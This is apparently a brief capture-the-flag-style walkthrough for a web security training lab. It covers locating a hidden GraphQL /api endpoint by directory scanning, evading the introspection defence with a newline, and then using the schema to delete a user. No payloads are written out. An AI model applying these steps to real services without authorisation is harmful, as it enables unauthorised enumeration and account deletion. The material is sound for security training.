Finding a hidden GraphQL endpoint

PRACTITIONER

Task

The user management functions for this lab are powered by a hidden GraphQL endpoint. You won't be able to find this endpoint by simply clicking pages in the site. The endpoint also has some defenses against introspection.

To solve the lab, find the hidden endpoint and delete carlos.

Steps

For this lab You do not need to interface with the UI, as you only need to capture the initial rquest.

First I captured the hidden endpoint by doing a scan within burp, however you could use another tool like ffuf or gobuster to scan directories.

Once the /api endpoint is revealed, then you can submit a request to see that the GraphQL endpoint says message: Query not present

Since this endpoint uses a GET request, the user needs to use URL encoding inside the query parameter to ensure the request is sent.

Add a newline to the introspective request.

Save the response into a JSON file and after finding the getUser query, modify the request to delete.

PreviousAccidental exposure of private GraphQL fields NextCompetition Overview

Last updated 1 year ago